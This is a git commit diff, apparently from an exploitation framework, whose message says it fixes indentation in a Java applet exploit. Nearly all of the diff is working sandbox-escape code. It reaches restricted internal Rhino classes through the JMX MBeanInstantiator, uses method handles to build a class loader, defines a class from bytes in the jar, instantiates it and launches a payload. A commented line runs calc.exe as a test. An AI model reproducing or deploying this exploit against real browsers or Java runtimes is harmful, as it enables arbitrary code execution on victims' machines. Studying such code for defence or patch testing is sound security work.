code indention for exploit.java fixed
jvazquez-r7
parent
876d889d82
commit
e503d596ed
|
|
@ -27,40 +27,40 @@ public class Exploit extends Applet
|
|||
{
|
||||
try
|
||||
{
|
||||
ByteArrayOutputStream bos = new ByteArrayOutputStream();
|
||||
byte[] buffer = new byte[8192];
|
||||
int length;
|
||||
ByteArrayOutputStream bos = new ByteArrayOutputStream();
|
||||
byte[] buffer = new byte[8192];
|
||||
int length;
|
||||
|
||||
// read in the class file from the jar
|
||||
InputStream is = getClass().getResourceAsStream("B.class");
|
||||
// and write it out to the byte array stream
|
||||
while( ( length = is.read( buffer ) ) > 0 )
|
||||
bos.write( buffer, 0, length );
|
||||
// convert it to a simple byte array
|
||||
buffer = bos.toByteArray();
|
||||
|
||||
JmxMBeanServerBuilder localJmxMBeanServerBuilder = new JmxMBeanServerBuilder();
|
||||
JmxMBeanServer localJmxMBeanServer = (JmxMBeanServer)localJmxMBeanServerBuilder.newMBeanServer("", null, null);
|
||||
MBeanInstantiator localMBeanInstantiator = localJmxMBeanServer.getMBeanInstantiator();
|
||||
ClassLoader a = null;
|
||||
Class localClass1 = localMBeanInstantiator.findClass("sun.org.mozilla.javascript.internal.Context", a);
|
||||
Class localClass2 = localMBeanInstantiator.findClass("sun.org.mozilla.javascript.internal.GeneratedClassLoader", a);
|
||||
MethodHandles.Lookup localLookup = MethodHandles.publicLookup();
|
||||
MethodType localMethodType1 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { MethodType.class });
|
||||
MethodHandle localMethodHandle1 = localLookup.findVirtual(MethodHandles.Lookup.class, "findConstructor", localMethodType1);
|
||||
MethodType localMethodType2 = MethodType.methodType(Void.TYPE);
|
||||
MethodHandle localMethodHandle2 = (MethodHandle)localMethodHandle1.invokeWithArguments(new Object[] { localLookup, localClass1, localMethodType2 });
|
||||
Object localObject1 = localMethodHandle2.invokeWithArguments(new Object[0]);
|
||||
MethodType localMethodType3 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { String.class, MethodType.class });
|
||||
MethodHandle localMethodHandle3 = localLookup.findVirtual(MethodHandles.Lookup.class, "findVirtual", localMethodType3);
|
||||
MethodType localMethodType4 = MethodType.methodType(localClass2, ClassLoader.class);
|
||||
MethodHandle localMethodHandle4 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass1, "createClassLoader", localMethodType4 });
|
||||
Object localObject2 = localMethodHandle4.invokeWithArguments(new Object[] { localObject1, null });
|
||||
MethodType localMethodType5 = MethodType.methodType(Class.class, String.class, new Class[] { byte[].class });
|
||||
MethodHandle localMethodHandle5 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass2,"defineClass", localMethodType5 });
|
||||
Class localClass3 = (Class)localMethodHandle5.invokeWithArguments(new Object[] { localObject2, null, buffer });
|
||||
localClass3.newInstance();
|
||||
|
||||
// read in the class file from the jar
|
||||
InputStream is = getClass().getResourceAsStream("B.class");
|
||||
// and write it out to the byte array stream
|
||||
while( ( length = is.read( buffer ) ) > 0 )
|
||||
bos.write( buffer, 0, length );
|
||||
// convert it to a simple byte array
|
||||
buffer = bos.toByteArray();
|
||||
|
||||
JmxMBeanServerBuilder localJmxMBeanServerBuilder = new JmxMBeanServerBuilder();
|
||||
JmxMBeanServer localJmxMBeanServer = (JmxMBeanServer)localJmxMBeanServerBuilder.newMBeanServer("", null, null);
|
||||
MBeanInstantiator localMBeanInstantiator = localJmxMBeanServer.getMBeanInstantiator();
|
||||
ClassLoader a = null;
|
||||
Class localClass1 = localMBeanInstantiator.findClass("sun.org.mozilla.javascript.internal.Context", a);
|
||||
Class localClass2 = localMBeanInstantiator.findClass("sun.org.mozilla.javascript.internal.GeneratedClassLoader", a);
|
||||
MethodHandles.Lookup localLookup = MethodHandles.publicLookup();
|
||||
MethodType localMethodType1 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { MethodType.class });
|
||||
MethodHandle localMethodHandle1 = localLookup.findVirtual(MethodHandles.Lookup.class, "findConstructor", localMethodType1);
|
||||
MethodType localMethodType2 = MethodType.methodType(Void.TYPE);
|
||||
MethodHandle localMethodHandle2 = (MethodHandle)localMethodHandle1.invokeWithArguments(new Object[] { localLookup, localClass1, localMethodType2 });
|
||||
Object localObject1 = localMethodHandle2.invokeWithArguments(new Object[0]);
|
||||
MethodType localMethodType3 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { String.class, MethodType.class });
|
||||
MethodHandle localMethodHandle3 = localLookup.findVirtual(MethodHandles.Lookup.class, "findVirtual", localMethodType3);
|
||||
MethodType localMethodType4 = MethodType.methodType(localClass2, ClassLoader.class);
|
||||
MethodHandle localMethodHandle4 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass1, "createClassLoader", localMethodType4 });
|
||||
Object localObject2 = localMethodHandle4.invokeWithArguments(new Object[] { localObject1, null });
|
||||
MethodType localMethodType5 = MethodType.methodType(Class.class, String.class, new Class[] { byte[].class });
|
||||
MethodHandle localMethodHandle5 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass2,"defineClass", localMethodType5 });
|
||||
Class localClass3 = (Class)localMethodHandle5.invokeWithArguments(new Object[] { localObject2, null, buffer });
|
||||
localClass3.newInstance();
|
||||
|
||||
Payload.main(null);
|
||||
//Runtime.getRuntime().exec("calc.exe");
|
||||
}
|
||||
|
|
|
|||
Loading…
Reference in New Issue